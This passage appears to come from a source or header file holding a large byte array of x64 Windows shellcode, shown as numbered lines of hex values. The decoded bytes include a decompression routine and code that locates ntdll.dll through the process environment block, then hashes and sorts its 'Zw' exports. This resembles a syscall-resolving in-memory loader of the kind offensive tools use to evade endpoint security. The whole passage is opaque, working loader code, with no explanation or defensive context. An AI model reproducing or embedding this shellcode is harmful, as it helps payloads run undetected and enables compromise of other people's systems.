2061 0x40, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2, 0x48, 0xc7,
2062 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xfb, 0x0b, 0x00, 0x00, 0x89, 0x45,
2063 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x79, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00,
2064 0xeb, 0x55, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8d, 0x90, 0xe0, 0x05, 0x00,
2065 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48,
2066 0x89, 0xc1, 0xe8, 0x0d, 0x04, 0x00, 0x00, 0x44, 0x8b, 0x45, 0xe0, 0x48,
2067 0x8d, 0x4d, 0xd0, 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b, 0x55, 0xf8, 0x48,
2068 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x55, 0xdc, 0x48, 0x89, 0x54, 0x24,
2069 0x20, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2, 0x48, 0xc7,
2070 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x9b, 0x0b, 0x00, 0x00, 0xb8, 0x01,
2071 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x90, 0x90, 0x90,
2072 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
2073 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10,
2074 0x8b, 0x40, 0x14, 0x8d, 0x48, 0xff, 0x48, 0x8b, 0x55, 0x10, 0x89, 0x4a,
2075 0x14, 0x85, 0xc0, 0x75, 0x2a, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x00,
2076 0x48, 0x8d, 0x48, 0x01, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x0a, 0x0f,
2077 0xb6, 0x00, 0x0f, 0xb6, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x89, 0x50, 0x10,
2078 0x48, 0x8b, 0x45, 0x10, 0xc7, 0x40, 0x14, 0x07, 0x00, 0x00, 0x00, 0x48,
2079 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x10, 0xc1, 0xe8, 0x07, 0x83, 0xe0, 0x01,
2080 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x10, 0x8d, 0x14,
2081 0x00, 0x48, 0x8b, 0x45, 0x10, 0x89, 0x50, 0x10, 0x8b, 0x45, 0xfc, 0x48,
2082 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x53, 0x48, 0x83, 0xec, 0x38, 0x48,
2083 0x8d, 0x6c, 0x24, 0x30, 0x48, 0x89, 0x4d, 0x20, 0xc7, 0x45, 0xfc, 0x01,
2084 0x00, 0x00, 0x00, 0x8b, 0x45, 0xfc, 0x8d, 0x1c, 0x00, 0x48, 0x8b, 0x4d,
2085 0x20, 0xe8, 0x66, 0xff, 0xff, 0xff, 0x01, 0xd8, 0x89, 0x45, 0xfc, 0x48,
2086 0x8b, 0x4d, 0x20, 0xe8, 0x58, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x75, 0xdf,
2087 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x38, 0x5b, 0x5d, 0xc3, 0x55, 0x53,
2088 0x48, 0x83, 0xec, 0x58, 0x48, 0x8d, 0x6c, 0x24, 0x50, 0x48, 0x89, 0x4d,
2089 0x20, 0x48, 0x89, 0x55, 0x28, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x89, 0x45,
2090 0xd0, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xe4,
2091 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0xff, 0xff, 0xff, 0xff, 0xc7,
2092 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00,
2093 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8d, 0x42, 0x01, 0x48, 0x89, 0x45,
2094 0xd0, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8d, 0x48, 0x01, 0x48, 0x89, 0x4d,
2095 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10, 0xe9, 0x41, 0x02, 0x00, 0x00, 0x48,
2096 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0xdd, 0xfe, 0xff, 0xff, 0x85,
2097 0xc0, 0x0f, 0x84, 0x09, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48,
2098 0x89, 0xc1, 0xe8, 0xc9, 0xfe, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0xf9,
2099 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0xb5,
2100 0xfe, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x76, 0xc7, 0x45, 0xfc, 0x00, 0x00,
2101 0x00, 0x00, 0xc7, 0x45, 0xe8, 0x04, 0x00, 0x00, 0x00, 0xeb, 0x1b, 0x8b,
2102 0x45, 0xfc, 0x8d, 0x1c, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1,
2103 0xe8, 0x8f, 0xfe, 0xff, 0xff, 0x01, 0xd8, 0x89, 0x45, 0xfc, 0x83, 0x6d,
2104 0xe8, 0x01, 0x83, 0x7d, 0xe8, 0x00, 0x75, 0xdf, 0x83, 0x7d, 0xfc, 0x00,
2105 0x74, 0x24, 0x48, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xfc, 0x48, 0xf7, 0xd8,
2106 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10,
2107 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x89, 0x45, 0xd8,
2108 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8d, 0x50, 0x01, 0x48, 0x89,
2109 0x55, 0xd8, 0xc6, 0x00, 0x00, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00,
2110 0xe9, 0x93, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x50,
2111 0x01, 0x48, 0x89, 0x55, 0xd0, 0x0f, 0xb6, 0x00, 0x0f, 0xb6, 0xc0, 0x89,
2112 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x83, 0xe0, 0x01, 0x83, 0xc0, 0x02, 0x89,
2113 0x45, 0xf8, 0xd1, 0x6d, 0xfc, 0x83, 0x7d, 0xfc, 0x00, 0x74, 0x30, 0xeb,
2114 0x26, 0x48, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xfc, 0x48, 0xf7, 0xd8, 0x48,
2115 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10, 0x48,
2116 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x89, 0x45, 0xd8, 0x83,
2117 0x6d, 0xf8, 0x01, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0xd4, 0xeb, 0x07, 0xc7,
2118 0x45, 0xec, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xfc, 0x89, 0x45, 0xf4,
2119 0xc7, 0x45, 0xf0, 0x01, 0x00, 0x00, 0x00, 0xe9, 0x20, 0x01, 0x00, 0x00,
2120 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0x31, 0xfe, 0xff, 0xff,
2121 0x89, 0x45, 0xfc, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x4e, 0x83, 0x7d, 0xfc,
2122 0x02, 0x75, 0x48, 0x8b, 0x45, 0xf4, 0x89, 0x45, 0xfc, 0x48, 0x8d, 0x45,
2123 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0x10, 0xfe, 0xff, 0xff, 0x89, 0x45, 0xf8,
2124 0xeb, 0x26, 0x48, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xfc, 0x48, 0xf7, 0xd8,
2125 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10,
2126 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x89, 0x45, 0xd8,
2127 0x83, 0x6d, 0xf8, 0x01, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0xd4, 0xe9, 0x90,
2128 0x00, 0x00, 0x00, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x06, 0x83, 0x6d, 0xfc,
2129 0x03, 0xeb, 0x04, 0x83, 0x6d, 0xfc, 0x02, 0xc1, 0x65, 0xfc, 0x08, 0x48,
2130 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x50, 0x01, 0x48, 0x89, 0x55, 0xd0, 0x0f,
2131 0xb6, 0x00, 0x0f, 0xb6, 0xc0, 0x01, 0x45, 0xfc, 0x48, 0x8d, 0x45, 0xd0,
2132 0x48, 0x89, 0xc1, 0xe8, 0xa5, 0xfd, 0xff, 0xff, 0x89, 0x45, 0xf8, 0x81,
2133 0x7d, 0xfc, 0xff, 0x7c, 0x00, 0x00, 0x76, 0x04, 0x83, 0x45, 0xf8, 0x01,
2134 0x81, 0x7d, 0xfc, 0xff, 0x04, 0x00, 0x00, 0x76, 0x04, 0x83, 0x45, 0xf8,
2135 0x01, 0x83, 0x7d, 0xfc, 0x7f, 0x77, 0x2c, 0x83, 0x45, 0xf8, 0x02, 0xeb,
2136 0x26, 0x48, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xfc, 0x48, 0xf7, 0xd8, 0x48,
2137 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10, 0x48,
2138 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x89, 0x45, 0xd8, 0x83,
2139 0x6d, 0xf8, 0x01, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0xd4, 0x8b, 0x45, 0xfc,
2140 0x89, 0x45, 0xf4, 0xc7, 0x45, 0xf0, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x24,
2141 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8d, 0x42, 0x01, 0x48, 0x89, 0x45, 0xd0,
2142 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8d, 0x48, 0x01, 0x48, 0x89, 0x4d, 0xd8,
2143 0x0f, 0xb6, 0x12, 0x88, 0x10, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00,
2144 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x84, 0xb5, 0xfd, 0xff, 0xff, 0x48, 0x8b,
2145 0x45, 0xd8, 0x48, 0x2b, 0x45, 0x28, 0x48, 0x83, 0xc4, 0x58, 0x5b, 0x5d,
2146 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
2147 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10,
2148 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x48,
2149 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x10, 0x8b, 0x45, 0x18,
2150 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf8, 0x88, 0x10, 0x48, 0x83, 0x45, 0xf8,
2151 0x01, 0x8b, 0x45, 0x20, 0x8d, 0x50, 0xff, 0x89, 0x55, 0x20, 0x85, 0xc0,
2152 0x75, 0xe3, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
2153 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10,
2154 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10,
2155 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf0,
2156 0xeb, 0x17, 0x48, 0x8b, 0x45, 0xf0, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45,
2157 0xf8, 0x88, 0x10, 0x48, 0x83, 0x45, 0xf8, 0x01, 0x48, 0x83, 0x45, 0xf0,
2158 0x01, 0x8b, 0x45, 0x20, 0x8d, 0x50, 0xff, 0x89, 0x55, 0x20, 0x85, 0xc0,
2159 0x75, 0xdc, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
2160 0x55, 0x56, 0x53, 0x48, 0x8d, 0x2c, 0x24, 0x48, 0x89, 0x4d, 0x20, 0x48,
2161 0x89, 0x55, 0x28, 0x44, 0x89, 0x45, 0x30, 0x48, 0x8b, 0x5d, 0x20, 0x48,
2162 0x8b, 0x75, 0x28, 0xeb, 0x38, 0x48, 0x89, 0xd8, 0x48, 0x8d, 0x58, 0x01,
2163 0x0f, 0xb6, 0x10, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x70, 0x01, 0x0f, 0xb6,
2164 0x00, 0x38, 0xc2, 0x74, 0x20, 0x48, 0x8d, 0x43, 0xff, 0x0f, 0xb6, 0x10,
2165 0x48, 0x8d, 0x46, 0xff, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x73, 0x07, 0xb8,
2166 0xff, 0xff, 0xff, 0xff, 0xeb, 0x19, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb,
2167 0x12, 0x8b, 0x45, 0x30, 0x8d, 0x50, 0xff, 0x89, 0x55, 0x30, 0x85, 0xc0,
2168 0x75, 0xbb, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5b, 0x5e, 0x5d, 0xc3, 0x55,
2169 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb,
2170 0x23, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0x18,
2171 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x74, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00,
2172 0xeb, 0x2f, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x83, 0x45, 0x18, 0x01,
2173 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x0b, 0x48,
2174 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xc7, 0x48, 0x8b,
2175 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x0f, 0x94, 0xc0, 0x0f, 0xb6,
2176 0xc0, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48,
2177 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb, 0x31, 0x48, 0x8b, 0x45,
2178 0x10, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x38,
2179 0xc2, 0x75, 0x1a, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0xc2, 0x48, 0x8b,
2180 0x4d, 0x10, 0xe8, 0x74, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x06, 0x48,
2181 0x8b, 0x45, 0x10, 0xeb, 0x15, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x8b,
2182 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xc4, 0xb8, 0x00, 0x00,
2183 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
2184 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb, 0x1c, 0x48, 0x8b,
2185 0x45, 0x10, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00,
2186 0x38, 0xc2, 0x75, 0x22, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x83, 0x45,
2187 0x18, 0x01, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
2188 0x0e, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xce,
2189 0xeb, 0x01, 0x90, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x0f, 0xbe,
2190 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x0f, 0xbe, 0xc8, 0x89,
2191 0xd0, 0x29, 0xc8, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d,
2192 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb, 0x2b, 0x48, 0x8b, 0x45, 0x10, 0x0f,
2193 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x18, 0x0f,
2194 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x38, 0xc2, 0x74, 0x07, 0xb8, 0x00, 0x00,
2195 0x00, 0x00, 0xeb, 0x2f, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x83, 0x45,
2196 0x18, 0x01, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
2197 0x0b, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xbf,
2198 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x0f, 0x94, 0xc0,
2199 0x0f, 0xb6, 0xc0, 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
2200 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
2201 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0xc7, 0x45, 0xfc, 0x00,
2202 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf8, 0x05, 0x05, 0xc2, 0x26, 0xeb, 0x28,
2203 0x8b, 0x45, 0xfc, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xfc, 0x89, 0xc2, 0x48,
2204 0x8b, 0x45, 0x10, 0x48, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x66, 0x89, 0x45,
2205 0xf6, 0x0f, 0xb7, 0x55, 0xf6, 0x8b, 0x45, 0xf8, 0xc1, 0xc8, 0x08, 0x01,
2206 0xd0, 0x31, 0x45, 0xf8, 0x8b, 0x55, 0xfc, 0x48, 0x8b, 0x45, 0x10, 0x48,
2207 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xc7, 0x8b, 0x45, 0xf8,
2208 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x53, 0x48, 0x81, 0xec, 0xc8,
2209 0x00, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0xc0, 0x00, 0x00, 0x00, 0x48,
2210 0x89, 0x4d, 0x20, 0x48, 0x8b, 0x45, 0x20, 0x8b, 0x00, 0x85, 0xc0, 0x74,
2211 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xe9, 0x88, 0x03, 0x00, 0x00, 0xc7,
2212 0x85, 0x74, 0xff, 0xff, 0xff, 0x60, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x74,
2213 0xff, 0xff, 0xff, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x85, 0x68, 0xff,
2214 0xff, 0xff, 0x48, 0x8b, 0x85, 0x68, 0xff, 0xff, 0xff, 0x48, 0x89, 0x45,
2215 0xd0, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45,
2216 0xc8, 0x48, 0xc7, 0x45, 0xf8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45,
2217 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xc8, 0x48, 0x8b, 0x40,
2218 0x10, 0x48, 0x89, 0x45, 0xe8, 0xe9, 0xa1, 0x00, 0x00, 0x00, 0x48, 0x8b,
2219 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b,
2220 0x45, 0xf0, 0x48, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xc0, 0x8b, 0x40,
2221 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x48,
2222 0x89, 0x45, 0xb8, 0x48, 0x8b, 0x45, 0xb8, 0x48, 0x05, 0x88, 0x00, 0x00,
2223 0x00, 0x48, 0x89, 0x45, 0xb0, 0x48, 0x8b, 0x45, 0xb0, 0x8b, 0x00, 0x89,
2224 0x45, 0xac, 0x83, 0x7d, 0xac, 0x00, 0x74, 0x4c, 0x8b, 0x55, 0xac, 0x48,
2225 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b,
2226 0x45, 0xf8, 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x48,
2227 0x01, 0xd0, 0x48, 0x89, 0x45, 0xa0, 0x48, 0x8b, 0x45, 0xa0, 0x8b, 0x00,
2228 0x0d, 0x20, 0x20, 0x20, 0x20, 0x3d, 0x6e, 0x74, 0x64, 0x6c, 0x75, 0x1b,
2229 0x48, 0x8b, 0x45, 0xa0, 0x48, 0x83, 0xc0, 0x04, 0x8b, 0x00, 0x0d, 0x20,
2230 0x20, 0x20, 0x20, 0x3d, 0x6c, 0x2e, 0x64, 0x6c, 0x74, 0x24, 0xeb, 0x04,
2231 0x90, 0xeb, 0x01, 0x90, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x00, 0x48,
2232 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x30, 0x48,
2233 0x85, 0xc0, 0x0f, 0x85, 0x4e, 0xff, 0xff, 0xff, 0xeb, 0x01, 0x90, 0x48,
2234 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
2235 0x6f, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x40, 0x18, 0x89,
2236 0x45, 0xe4, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x40, 0x1c, 0x89, 0xc2, 0x48,
2237 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x98, 0x48, 0x8b,
2238 0x45, 0xf8, 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x48,
2239 0x01, 0xd0, 0x48, 0x89, 0x45, 0x90, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x40,
2240 0x24, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x48, 0x89,
2241 0x45, 0x88, 0xc7, 0x45, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
2242 0x20, 0x48, 0x83, 0xc0, 0x04, 0x48, 0x89, 0x45, 0x80, 0x8b, 0x45, 0xe4,
2243 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00,
2244 0x00, 0x48, 0x8b, 0x45, 0x90, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2,
2245 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x78, 0xff,
2246 0xff, 0xff, 0x48, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff, 0x0f, 0xb7, 0x00,
2247 0x66, 0x3d, 0x5a, 0x77, 0x75, 0x70, 0x8b, 0x45, 0xe0, 0x48, 0x8d, 0x14,
2248 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48, 0x8d, 0x1c,
2249 0x02, 0x48, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8,
2250 0xac, 0xfd, 0xff, 0xff, 0x89, 0x03, 0x8b, 0x45, 0xe4, 0x83, 0xe8, 0x01,
2251 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0x88, 0x48, 0x01,
2252 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00,
2253 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x98, 0x48, 0x01, 0xd0, 0x8b, 0x55,
2254 0xe0, 0x48, 0x8d, 0x0c, 0xd5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55,
2255 0x80, 0x48, 0x01, 0xca, 0x8b, 0x00, 0x89, 0x42, 0x04, 0x83, 0x45, 0xe0,
2256 0x01, 0x81, 0x7d, 0xe0, 0xf4, 0x01, 0x00, 0x00, 0x74, 0x10, 0x83, 0x6d,
2257 0xe4, 0x01, 0x83, 0x7d, 0xe4, 0x00, 0x0f, 0x85, 0x49, 0xff, 0xff, 0xff,
2258 0xeb, 0x01, 0x90, 0x48, 0x8b, 0x45, 0x20, 0x8b, 0x55, 0xe0, 0x89, 0x10,
2259 0xc7, 0x45, 0xdc, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x30, 0x01, 0x00, 0x00,
2260 0xc7, 0x45, 0xd8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x0b, 0x01, 0x00, 0x00,
2261 0x8b, 0x45, 0xd8, 0x48, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48,
2262 0x8b, 0x45, 0x80, 0x48, 0x01, 0xd0, 0x8b, 0x50, 0x04, 0x8b, 0x45, 0xd8,
2263 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x0c, 0xc5, 0x00, 0x00, 0x00,
2264 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48, 0x01, 0xc8, 0x8b, 0x40, 0x04, 0x39,
2265 0xc2, 0x0f, 0x86, 0xd0, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd8, 0x48, 0x8d,
2266 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48, 0x01,
2267 0xd0, 0x8b, 0x00, 0x89, 0x85, 0x60, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xd8,
2268 0x48, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x80,
2269 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x04, 0x89, 0x85, 0x64, 0xff, 0xff, 0xff,
2270 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0xc5,
2271 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48, 0x01, 0xd0, 0x8b,
2272 0x55, 0xd8, 0x48, 0x8d, 0x0c, 0xd5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
2273 0x55, 0x80, 0x48, 0x01, 0xca, 0x8b, 0x00, 0x89, 0x02, 0x8b, 0x45, 0xd8,
2274 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00,
2275 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48, 0x01, 0xd0, 0x8b, 0x55, 0xd8, 0x48,
2276 0x8d, 0x0c, 0xd5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x80, 0x48,
2277 0x01, 0xca, 0x8b, 0x40, 0x04, 0x89, 0x42, 0x04, 0x8b, 0x45, 0xd8, 0x83,
2278 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00,
2279 0x48, 0x8b, 0x45, 0x80, 0x48, 0x01, 0xc2, 0x8b, 0x85, 0x60, 0xff, 0xff,
2280 0xff, 0x89, 0x02, 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48,
2281 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48,
2282 0x01, 0xc2, 0x8b, 0x85, 0x64, 0xff, 0xff, 0xff, 0x89, 0x42, 0x04, 0x83,
2283 0x45, 0xd8, 0x01, 0x48, 0x8b, 0x45, 0x20, 0x8b, 0x00, 0x2b, 0x45, 0xdc,
